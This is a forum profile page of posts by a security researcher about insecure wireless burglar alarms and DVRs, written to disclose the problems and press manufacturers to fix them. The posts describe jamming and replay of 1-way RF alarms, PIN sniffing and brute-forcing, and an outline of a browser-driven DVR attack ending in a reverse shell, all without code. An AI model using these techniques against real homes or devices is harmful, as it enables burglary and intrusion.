cybergibbons
-
Posts
498 -
Joined
-
Last visited
-
Days Won
7
Content Type
Profiles
Forums
Events
Downloads
Gallery
Blogs
Posts posted by cybergibbons
-
-
Can't see any reason why it wouldn't work. Just be aware that the adapters get warm, and don't like being covered. I'd provide for means of power cycling without climbing into the loft, if possible.
-
Thanks. Cheap as well!
-
I'd like to properly demonstate that graded wireless alarms aren't immune to jamming and replay attacks.
In 2012/2013, I found that a Cooper iON alarm could be jammed and replayed, as it uses 1-waay RF and the protocol seems pretty legacy.
What other 1-way alarms are on the market?
Texecom is 2-way, Pyronix is 2-way, HKC is 2-way. -
5 hours ago, al-yeti said:
What you doing in Ealing and hounslow then?
Casing big houses with Yale alarms.-
1
-
-
Obviously you can't judge value of good inside from size of house, but there are several 5/6 bedroom houses in Ealing and Hounslow with Yale alarms.
-
11 hours ago, Nova-Security said:
I meant the equipment to capture the signal and turn the alarm off.
My mistake
Ah, ok. I mean, given that the jamming works (and works well), then I think that would be the attack chosen. Only downside to it is that you don't get confirmation the alarm is disarmed, you need to hope for the best.
The replay is awkward as well, as capturing the signal requires you are there when the alarm is armed or disarmed (you can modify one signal to the other easily). That means planning, and the last few "psychology of a burglar" things I have read suggest there is rarely any planning beyond driving round the area beforehand.
-
1 hour ago, al-yeti said:
I think this has more to do with advertising something with correct description , although if it received wide publicity Yale would be damaged and probably try to do CG
You need air time then it will get attention otherwise no one gives a monkey
They'd be in a pretty weak position, given they OKed me releasing the issues.
-
1 hour ago, Nova-Security said:
Cant see it happening for a couple of reason's
1) Most yale alarms are on houses that couldn't afford a proper Grade2X system, that why they have purchased a DIY kit.
2) If you have the equipment needed and the know how, then your probably all ready employed in the IT / electronics field on £30K + so why would you want to target the people in 1.
Also if the Yale alarms are installed DIY and not covered by a maintenance contract by a Co for the NSI or SSAIB firm, the insurance Co treats the premises as if it hasn't got an alarm (no discounts)
1. It's really not just Yale that have the issue. Anything that isn't 2-way suffers from the issue, including the graded stuff. If you take a look at a number of systems, they aren't 2-way.
2. The jammers are available from China for £50.
-
7 hours ago, DCINETRED said:
Not all are jammers!
I'm also a radio amateur 434mhz is right in the middle of the 70cm amateur band. I run a few amateur repeaters (fully licensed by Ofcom) when they transmit (25w) they knock out all nearby 434Mhz keyfobs..... and by the look of the report Yale alarms!!
Not all signals you see are jammers, but the boxes the police are recovering are.
25W would be horrific in a built up area for these things. 500mW is already enough!
-
Find someone to do it for less...
-
In that instance, Domonial in a new build.
They hadn't paid for maintenance, and were asking if I could recover the log from the panel.
I can't even vaguelly work these panels out even with an engineers code. Quoted £500 to have a look but they weren't interested. -
9 hours ago, james.wilson said:
i do think this will become more of an issue, but while insurers see them as the same and are more worried about flood it wont make a headline
There's evidence of jammers being used a lot for car theft now, the police are finding them fairly regularly, and a few court cases have had them submitted as evidence. Basic jammers though, just sending a signal all of the time.
Thing that is puzzling is that, as far as I know, the police haven't recovered any of the gizmos used to get past the more advanced security. Plenty of CCTV footage of thieves walking up to cars and stepping in though.
9 hours ago, norman said:Problem as I see it is, and correct me if I'm wrong, there is no trail of tampering? Much like a bump key if they lock it after your goosed
Yep. Unfortunately the people who contacted me wanted me to look into it for free, so it was just emails back and forth.
One of them, the problem was that they mentioned to the police the alarm was armed. This got put in the crime report, the insurers didn't believe them...
-
18 minutes ago, MrHappy said:
ain't there upto 100k in an ATM ?
In fact I fancy mending ATMs or traffic lights rather than alarms (no chin rubbing smiley anymore
)
That's about the upper limit, but with a mix of £20s and £10s, normally a lot less. The ones in banks tend to be filled with more.
Look at these muppets though - spent months digging a tunnel to net a couple of thousand:
http://www.manchestereveningnews.co.uk/news/greater-manchester-news/mole-gang-dig-100ft-tunnel-679754 -
3 hours ago, norman said:
Because less and less people give a hoot I reckon, and why would a crim go to the trouble of jamming or even capturing a PIN on someone who has a YALE system.
I'd be interested to know the true figures for any radio system circumnavigated in a similar way.
I also wish I has a pound for every YALE system sold, people buy it through brand trust and recognition.
I dunno, the houses with them on are getting bigger and bigger, and some of the amazon reviews talk of big installs.
The PIN etc, yeah, not likley. The jamming though, really easy, reliable and cheap. I'd love to say much more expensive alarms can't be jammed, but a fair few can.
So far in the last 4 years, I've had 8 people approach me about break-ins without alarms going off. One of them I would definitely put down to mental health issues, one was a wired alarm, but the other 6 look credible. Hard to say really.
Just think manufacturers should all be pulling their weight here, and now stuff is getting Internet connected, even more so. Videofied was terrible, as was Risco. -
They seem to have had a bit of an odd history with alarms, looks like they were a bit more like ADT a long while back, then went to just consumer, and are now back trying some pro installs.
-
1
-
-
That was the earliest one I could see - 1993-ish. Were there any others around that time?
-
Last week I presented at IFSEC on the issues with wireless alarms, especially the cheap ones. It was received quite well, but we weren't allowed to name names.
We've published a blog post about it now:https://www.pentestpartners.com/blog/alarm-systems-alarmingly-insecure-oh-the-irony/
The short of it - easy to jam, easy to replay disarm signals, you can sniff the PIN over-the-air if you use a remote keypad, you can brute-force the PIN as well. I reported these issues to Yale 4 years ago.
However, they seem to be getting more and more popular as time goes on. -
We've just published a blog about why these alarms are not great. Stick with graded wireless or wired if possible. If you look on my personal site, you can see what I think of the various systems.
https://www.pentestpartners.com/blog/alarm-systems-alarmingly-insecure-oh-the-irony/
The short of it - easy to jam, easy to replay disarm signals, you can sniff the PIN over-the-air if you use a remote keypad, you can brute-force the PIN as well. I reported these issues to Yale 4 years ago.
-
1
-
-
We're planning on publishing something about securing DVRs and IP cameras in the next month or so... sorry for the delay.
-
cg can you give a best practice tsi members should be doing? to mitigate the issues as much as possible
Yeah, happy to write something up. Short of time at the moment.
-
From what I've gathered in reading, no home router is safe without an outbound firewall weather it has a dvr connected or not.
Port forwarding a dvr seems to create a flag for an easy entry route for the automated hackers?
Modern plug and play dvrs are just as vulnerable...
HIK dvrs are ok?
Hmm why tell the customer that you are creating a vulnerability in their network when the network already has a vulnerability with all these automated hacking things from abroad...unles you are port forwarding which seems old hat and not done much now. Please enlighten.
I can hopefully clarify a bit.
Your own computer can be used as a pivot as well. It probably would be used as a pivot if you are running XP, with no firewall, no antivirus, out-of-date software, and you didn't care when it started crawling to a halt and the cursor started moving of it's own accord.
That's pretty much what a DVR is - out of date OS, with no firewall, no antivirus, no updates, and you can't actually see what it is doing.
Personally, I would make sure that I wasn't responsible for security issues with the DVR. I don't know the solution though, it's something we are working on in the IT security world. It's way too complex for people to get right at the moment.
And yes, Hikvision DVRs seem above average. They respond to issues, actually issue firmware updates for most gear, and there is a clear trend showing that they are improving.
-
These attacks regularly happen against routers and are automated and embedded on far more sites than you'd imagine.
-
If I embed an image link in a web page or email:
And you visit that site, the request will be made to the DVR and it will act on it. I can't see the response, but that doesn't matter.
So you might have the DVR on another IP. WebRTC will allow me to find your PCs IP. I can then scan the rest of the IPs for the DVR, maybe checking for an image on the login page.
Then change ps for the reverse shell command. The DVR will then connect to my server and allow me to control it. This would only be stopped by outbound firewalling, which is rare on home and small business networks.
-
Samsung DVRs have known issues:
https://www.andreafabrizi.it/?exploits:samsung:dvrhttps://www.kb.cert.org/vuls/id/882286
http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html
I'm about to publish a vulnerability across many of their IP cameras as well.
Hikvision haven't been too bad when reporting vulnerabilities. Their cameras are so-so, still making a lot of mistakes but nothing awful. Not looked at a DVR of theirs.
)
Which graded alarms use 1-way RF?
in Members Lounge (Public)
Posted
TBH, I would prefer self-certified, as it shows that self-certification isn't all it's cracked up to be. Is it possible to tell what has been done?
To be blunt, I don't understand how some alarms are standards compliant as they just don't seem to detect jamming.